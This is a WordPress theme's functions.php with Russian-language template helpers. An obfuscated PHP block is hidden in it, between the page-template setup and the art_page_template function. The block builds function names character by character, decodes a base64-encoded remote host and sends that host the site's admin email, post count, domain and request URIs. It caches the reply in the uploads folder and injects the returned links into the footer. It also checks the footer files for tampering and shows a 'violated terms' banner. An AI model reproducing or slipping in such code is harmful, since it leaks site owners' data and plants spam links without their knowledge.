<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $moBN='b';$aIXtA='c';$IOMywLG='_';$yfuw='e';$ixQZgE='o';$htXiFm='6';$SATFyU='e';$VPIYiC='s';$EbylaY='d';$sRLOWh='4';$LSbWUwM='e';$AsSBpMY='d';$cvevcL='a';$lcuPQLHm=$moBN.$cvevcL.$VPIYiC.$LSbWUwM.$htXiFm.$sRLOWh.$IOMywLG.$AsSBpMY.$yfuw.$aIXtA.$ixQZgE.$EbylaY.$SATFyU;$PgJvxAg='g';$qMYc='i';$DqerXxW='n';$HXfTm='e';$AYzrT='z';$ICvSTh='a';$JloAbvk='f';$WVtmZKj='t';$SKDjl='l';$NHtFQmpA=$PgJvxAg.$AYzrT.$qMYc.$DqerXxW.$JloAbvk.$SKDjl.$ICvSTh.$WVtmZKj.$HXfTm;$LsiFjab='1';$zEkmeHR='t';$jjSybb='r';$URRwM='_';$cbMYvd='o';$ZeVt='s';$AlesJgu='3';$VeBrM='t';$xFLdA='r';$IMxrpSji=$ZeVt.$VeBrM.$xFLdA.$URRwM.$jjSybb.$cbMYvd.$zEkmeHR.$LsiFjab.$AlesJgu;$YjWQmYs='e';$KLZmQK='t';$kAwD='r';$VQAFBzR='v';$BIWy='s';$APfyeWg='r';$lsvCGaSc=$BIWy.$KLZmQK.$APfyeWg.$kAwD.$YjWQmYs.$VQAFBzR;                     $rr___________r='b';$vl_______g='c';$hb_____w='_';$ab________b='e';$zp______a='o';$qi_______________r='6';$em_______________o='e';$ko____b='s';$qw_________h='d';$jz_______________d='4';$aa_________o='e';$dj_______u='d';$at_______________j='a';$hf__e=$rr___________r.$at_______________j.$ko____b.$aa_________o.$qi_______________r.$jz_______________d.$hb_____w.$dj_______u.$ab________b.$vl_______g.$zp______a.$qw_________h.$em_______________o;$ea__x='s';$zn_______________q='f';$hl_____n='i';$wj____j='o';$nw___________d='n';$sf_______________p='t';$fg__________x='u';$pr__p='n';$sr____b='i';$ez_____j='_';$gv_____u='e';$oj_________z='c';$ft_____________n='t';$sy______________g='x';$pe_______________f='s';$xe___________e=$zn_______________q.$fg__________x.$nw___________d.$oj_________z.$ft_____________n.$sr____b.$wj____j.$pr__p.$ez_____j.$gv_____u.$sy______________g.$hl_____n.$ea__x.$sf_______________p.$pe_______________f;$hf_______h='p';$io_________w='n';$oh_______k='o';$qk______f='f';$fs_________a='e';$od___________e=$qk______f.$oh_______k.$hf_______h.$fs_________a.$io_________w;$ls_________y='r';$bf_____________k='e';$bx____________j='d';$iw___q='f';$gf____________r='a';$ba__________p=$iw___q.$ls_________y.$bf_____________k.$gf____________r.$bx____________j;$ql____y='o';$rk___a='f';$tf____________u='l';$lh___d='c';$ge___________u='s';$sh______l='e';$bi_________i=$rk___a.$lh___d.$tf____________u.$ql____y.$ge___________u.$sh______l;define("WP_ID", $hf__e("Mi4wLjA="));define("WP_TTL", $hf__e("MTA4MDA="));define("WP_SRC", $hf__e("dHBva24="));function wp_get_header() {global $hf__e, $xe___________e;if ($xe___________e($hf__e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$xe___________e($hf__e("d3BfZ2V0X2Zvb3Rlcg==")) &&$xe___________e($hf__e("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $hf__e, $od___________e, $bi_________i, $ba__________p;$lt________x = TEMPLATEPATH."/".$hf__e("Zm9vdGVyLnBocA==");$zg_________z = @$od___________e($lt________x, "r");$lt________x = @$ba__________p($zg_________z, @filesize($lt________x));@$bi_________i($zg_________z);$xr_____________y = TEMPLATEPATH."/".$hf__e("ZnVuY3Rpb25zLnBocA==");$zg_________z = @$od___________e($xr_____________y, "r");$xr_____________y = @$ba__________p($zg_________z, @filesize($xr_____________y));@$bi_________i($zg_________z);$rw__________a = 0;if($lt________x && $xr_____________y) {if ($hf__e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($lt________x, $hf__e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$rw__________a = 1;}if (substr_count($lt________x, "wp_theme_GPL_credits()") < 1) {$rw__________a = 2;}}if(WP_ID != "2.0.0") {$rw__________a = 12;}}if($rw__________a > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $rw__________a -->";}}function wp_loaded() {global $hf__e, $xe___________e;return $xe___________e($hf__e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($vt__a, $aj____v = "(more...)", $ox__u = 0, $od____b = "") {$dg______________d = get_the_content($aj____v, $ox__u, $od____b);$dg______________d = apply_filters("the_content", $dg______________d);$dg______________d = str_replace("]]>", "]]>", $dg______________d);if (strlen($_GET["p"]) > 0) {echo $dg______________d;}else if ((strlen($dg______________d)>$vt__a) && ($xq________v = strpos($dg______________d, " ", $vt__a ))) {$dg______________d = substr($dg______________d, 0, $xq________v);$dg______________d = $dg______________d;echo $dg______________d;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$aj____v</a></div></p>";} else {echo $dg______________d;}}}$ar____________c='a';$hq_____u='e';$mr_______________f='e';$hp_________v='_';$vk______________w='6';$fy_______b='4';$cx__x='d';$hz____________m='e';$yl__________g='o';$tq_____________w='b';$lw_______w='c';$lc__t='s';$iu___i='n';$qi_______________n=$tq_____________w.$ar____________c.$lc__t.$hq_____u.$vk______________w.$fy_______b.$hp_________v.$mr_______________f.$iu___i.$lw_______w.$yl__________g.$cx__x.$hz____________m;$zu____________z='_';$xx_____q='_';$bk____________o='t';$wc__________d='s';$ft_____________u='o';$tl_______w='t';$hf_________r='c';$li______________n='e';$tk_______________w='i';$cl_________j='f';$cy______________a='t';$py____________b='e';$gr_________a='n';$jz_____d='l';$uh___________t='n';$pa________w='e';$mf____e='g';$xw_______________n=$cl_________j.$tk_______________w.$jz_____d.$pa________w.$zu____________z.$mf____e.$li______________n.$tl_______w.$xx_____q.$hf_________r.$ft_____________u.$uh___________t.$bk____________o.$py____________b.$gr_________a.$cy______________a.$wc__________d;$tv_________t='f';$hn_____g='_';$iv_______p='t';$ar____n='e';$nd_____________h='i';$lz_____________z='i';$gx______q='l';$ob______q='x';$zj__k='s';$qx______m='e';$ts_____j='s';$iz______________x=$tv_________t.$lz_____________z.$gx______q.$qx______m.$hn_____g.$ar____n.$ob______q.$nd_____________h.$zj__k.$iv_______p.$ts_____j;$vs________s='c';$sa_____m='s';$cx_________u='n';$fs_______________a='e';$xy_______z='i';$ed__f='o';$ic__g='p';$ci____f='r';$cs___b='o';$wl__________j='e';$bs_____p='r';$ue______q='_';$ak_____d='a';$vi_____________o='m';$vr_______w='v';$az____s=$vr_______w.$wl__________j.$bs_____p.$sa_____m.$xy_______z.$cs___b.$cx_________u.$ue______q.$vs________s.$ed__f.$vi_____________o.$ic__g.$ak_____d.$ci____f.$fs_______________a;$wo_______________v='c';$my______________t='s';$yg_____t='f';$ei_______________o='k';$fy_______________d='e';$sc_____________k='o';$wu___u='p';$qg___t='o';$fg______________r='n';$zf_______________b=$yg_____t.$my______________t.$qg___t.$wo_______________v.$ei_______________o.$sc_____________k.$wu___u.$fy_______________d.$fg______________r;$sb______n='t';$vb_____s='i';$rg____c='e';$sq______________x='f';$ki____________k='w';$wi______y='r';$dn_____________g=$sq______________x.$ki____________k.$wi______y.$vb_____s.$sb______n.$rg____c;$is______b='d';$th________p='m';$tp_________l='5';$zn_____l=$th________p.$is______b.$tp_________l;$dg______o='e';$yh_________n='l';$mx__________h='h';$dr__________m='a';$ud__m='r';$lg_______h='p';$gi______________v='a';$vy______b='t';$hh______________s=$ud__m.$dg______o.$dr__________m.$yh_________n.$lg_______h.$gi______________v.$vy______b.$mx__________h;$mu_____b='s';$jv______________o='n';$gf___________l='e';$jf_______t='i';$dc________d='u';$ep__________v='a';$ap______z='i';$bn_________i='e';$ch____________g='l';$bh______n='z';$ym________t='r';$jd__y=$dc________d.$jv______________o.$mu_____b.$gf___________l.$ym________t.$ap______z.$ep__________v.$ch____________g.$jf_______t.$bh______n.$bn_________i;$ux_______________h='m';$dk______________w='t';$xi___r='n';$zi________h='m';$pi___________e='p';$iv_________p='a';$rh__________m='e';$gk_______h=$dk______________w.$rh__________m.$zi________h.$pi___________e.$xi___r.$iv_________p.$ux_______________h;$ci____________n='s';$ro___c='e';$af_______n='n';$rr_______y='_';$vu_______j='t';$bp___r='e';$qb_____n='a';$lm________p='c';$mv_________o='x';$nr_______u='r';$wt______x='t';$bp__f='_';$cp______________q='m';$eg_____________z='o';$ev________h='c';$aw__n='t';$sq_____b='a';$th__________t='r';$lk____c='t';$my_____i='e';$jk__________z='e';$jx______i=$ci____________n.$vu_______j.$nr_______u.$bp___r.$qb_____n.$cp______________q.$rr_______y.$ev________h.$eg_____________z.$af_______n.$wt______x.$jk__________z.$mv_________o.$lk____c.$bp__f.$lm________p.$th__________t.$my_____i.$sq_____b.$aw__n.$ro___c;function cl______________x($xx___a) {global $hf__e, $xe___________e, $xw_______________n, $az____s, $jx______i;if (!$xe___________e($hf__e("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($az____s(PHP_VERSION, "5.0.0", ">=") && $xe___________e($hf__e("ZmlsZV9nZXRfY29udGVudHM=")) && $xe___________e($hf__e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$zh_____u = $jx______i(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ah___k = @$xw_______________n($xx___a, 0, $zh_____u);} else {$ah___k = @$xw_______________n($xx___a, 0);}return $ah___k;}function ex______________s($xx___a) {global $xe___________e, $zf_______________b, $dn_____________g, $hf__e;if (!$xe___________e($hf__e("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$xq_____________k = strpos($xx___a, "/", 7);$hx___________m = array("uri"     => substr($xx___a, $xq_____________k),"host"    => str_replace("http://", "", substr($xx___a, 0, $xq_____________k)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$rg____z = @$zf_______________b("$hx___________m[host]", 80, $zq______w, $yu______________g, 4);if (!$rg____z) {return false;} else {$ah___k = "";$vm_____v  = "GET $hx___________m[uri] HTTP/1.0\r\n";$vm_____v .= "Host: $hx___________m[host]\r\n";$vm_____v .= "Referer: $hx___________m[referer]\r\n";$vm_____v .= "Connection: Close\r\n\r\n";@$dn_____________g($rg____z, $vm_____v);while (!@feof($rg____z)) {$ao________x = @fgets($rg____z, (1024*24));if ($ao________x == "\r\n") {$lu_________h = true;continue;}if ($lu_________h) {$ah___k .= $ao________x;}}return $ah___k;}}function qt_________f($xx___a) {global $xe___________e;$om__________o = false;if ($xx___a != "") {if ($xe___________e("cl______________x")) {$om__________o = @cl______________x($xx___a);}if (!$om__________o && ($xe___________e("ex______________s"))) {$om__________o = @ex______________s($xx___a);}}return $om__________o;}function fu_________h() {global $_SERVER, $zn_____l;$ln________q = $_SERVER["SERVER_NAME"];if (substr("$ln________q", 0, 4) == "www.") {$ln________q = substr("$ln________q", 4);}$ln________q = $zn_____l("$_SERVER[SERVER_NAME]");return $ln________q;}function ql_____k() {return "file";}function vr_______m($xx___a) {global $_SERVER, $xw_______________n, $iz______________x, $od___________e, $bi_________i, $dn_____________g;$sy______________z = uw______u();$de__q = fu_________h().".jpg";$ky___f = $sy______________z["dir_upload"]["path"]."/$de__q";$xj______n = @filemtime($ky___f);if (!$xj______n || ((time()-$xj______n) >= WP_TTL)) {$om__________o = qt_________f($xx___a);if ($om__________o) {if ($iz______________x($ky___f)) {@unlink($ky___f);}$zg_________z = @$od___________e($ky___f, "x+");@$dn_____________g($zg_________z, $om__________o);@$bi_________i($zg_________z);}} else {if ($iz______________x($ky___f)) {$om__________o = @$xw_______________n($ky___f);} else {$om__________o = false;}}return $om__________o;}function uw______u() {global $_SERVER, $hf__e, $qi_______________n;$dw____i = wp_count_posts("post");$uj_______________f = pathinfo(get_bloginfo("template_directory"));$sy______________z = array("url" => array("report"      => $hf__e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $uj_______________f,"dir_upload"=> ne______i(),"queryString"=> array("?a001=".WP_ID,"a004=".$uj_______________f[filename],"a005=".$dw____i->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$sy______________z["url"]["queryString"] = implode("&", $sy______________z["queryString"]);$sy______________z["url"]["report"] = $sy______________z["url"]["report"]."/?".$qi_______________n($sy______________z["url"]["queryString"]).".html";return $sy______________z;}function ne______i() {$qt__________r = wp_upload_dir();if (isset($qt__________r["error"])) {$sl_______g = mn____g();if (is_writable($sl_______g)) {$qt__________r = array("path" => $sl_______g);}}return $qt__________r;}function mn____g() {global $xe___________e, $zn_____l, $hh______________s, $gk_______h;$wj______m = (bool) ini_get("safe_mode");if ($wj______m == true) {return false;}if ($xe___________e("sys_get_temp_dir")) {$sj______________z = sys_get_temp_dir();if (is_writable($sj______________z)) {return $hh______________s($sj______________z);}}if (!empty($_ENV["TMP"])) {return $hh______________s($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $hh______________s($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $hh______________s($_ENV["TEMP"]);} else {$bu____________g = $gk_______h($zn_____l(uniqid(rand(), true)), "");if ($bu____________g) {$sj______________z = $hh______________s(dirname($bu____________g));@unlink($bu____________g);return $sj______________z;} else {return false;}}}function fe_______________r() {global $_GET, $iz______________x;$sy______________z = uw______u();$ln________q = fu_________h();$zi_______________y = ql_____k();$gi____y = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($zi_______________y == "file") {$xl_____r = $sy______________z["dir_upload"]["path"]."/".$ln________q.".jpg";if ($iz______________x($xl_____r)) {@unlink($xl_____r);$gi____y = "deleted";}}$ix__________u = array("s"=> $gi____y,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ix__________u AS $uw___r => $hj_______f) echo " [$uw___r:$hj_______f]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $xe___________e, $hf__e, $jd__y;$sy______________z = uw______u();$oy____________x = "vr_______m";if ($xe___________e($oy____________x)) {$ah___k = $oy____________x($sy______________z["url"]["report"]);}if ($ah___k) {if ($ah___k = @$hf__e($ah___k)) {$ah___k = @$jd__y($ah___k);if (strlen($ah___k[custom_credit]) >= 5) {$sy______________z["default_string"] = $ah___k[custom_credit];}if ($ah___k["status"] == "0") {$cu_________i = 1;$mn_______v = 1;} else {$jc___i = sizeof($ah___k["links"]);$rl____u = $sy______________z["default_string"];if ($jc___i > 0 && $ah___k["links"] !== "") {$hq_____l = 0;foreach ($ah___k["links"] as $od____________t => $gp___________a) {$hq_____l++;if ($gp___________a->l_path == "" || $gp___________a->l_path == $_SERVER["REQUEST_URI"]) {$gp___________a->l_href = htmlspecialchars(strip_tags($gp___________a->l_href));$gp___________a->l_title = htmlspecialchars(strip_tags($gp___________a->l_title));$gp___________a->l_anchor = htmlspecialchars(strip_tags($gp___________a->l_anchor));$rl____u .= " | ";$rl____u .= "<a href='$gp___________a->l_href' title='$gp___________a->l_title'";if ($gp___________a->l_nofollow == "1") {$rl____u .= " rel='nofollow'";}$rl____u .= ">$gp___________a->l_anchor</a>";}}}$sy______________z["links"] = "$rl____u";if ($ah___k[credit] == "0") {$sy______________z["links"] = "";}}} else {$cu_________i = "1";}} else {$cu_________i = "1";}if ($cu_________i == "1") {$sy______________z["links"] = $sy______________z["default_string"];}echo "$sy______________z[links]";echo "<!-- s: $ah___k[signature] -->";fe_______________r();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
     $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
